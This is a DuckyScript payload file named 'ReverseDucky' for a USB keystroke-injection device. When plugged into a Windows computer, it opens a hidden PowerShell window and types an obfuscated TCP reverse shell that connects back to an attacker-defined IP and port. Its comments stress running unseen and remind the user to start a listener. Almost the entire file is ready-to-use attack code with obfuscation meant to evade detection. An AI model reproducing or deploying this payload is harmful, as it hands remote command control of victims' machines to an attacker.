1
REM       ReverseDucky
2
REM       Version 2.0
3
REM       OS: Windows / Linux(?) (Not tested with Powershell on Linux)
4
REM       Author: 0i41E
5
REM       Requirement: DuckyScript 3.0
6

7
REM       TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
8
REM       Define the attacker IP and PORT at line 38 & 39
9
REM       DON'T FORGET TO START LISTENER
10

11
REM Extension DETECT_READY by Korben for best and fastest deployment
12
EXTENSION DETECT_READY
13
    REM VERSION 1.0
14

15
    REM USAGE:
16
    REM Extension runs inline (here)
17
    REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
18
    REM boot delay
19

20
    REM TARGETS:
21
    REM Any system that reflects CAPSLOCK will detect minimum required delay
22
    REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
23

24
    REM CONFIGURATION:
25
    DEFINE RESPONSE_DELAY 25
26
    DEFINE ITERATION_LIMIT 120
27

28
    VAR $C = 0
29
    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))
30
        CAPSLOCK
31
        DELAY RESPONSE_DELAY
32
        $C = ($C + 1)
33
    END_WHILE
34
    CAPSLOCK
35
END_EXTENSION
36

37
REM Define the attackers IP & Port
38
DEFINE ADDRESS '0.0.0.0'
39
DEFINE PORT 4444
40

41
DELAY 1500
42
GUI r
43
DELAY 500
44
STRINGLN powershell -NoP -NonI -w h
45
DELAY 500
46
STRINGLN $0LVhbQ=[TyPE]('tExT'+'.enCOD'+'InG');$C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient( ADDRESS , PORT );$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'Ducky@PS '+(&('g'+'l'))+'> ';$sbt=($0lvHBq::ASCII).GetBytes($Z);$S.Write($sbt,0,$sbt.Length);$S.Flush()};$C.Close();exit
47
CAPSLOCK
48

49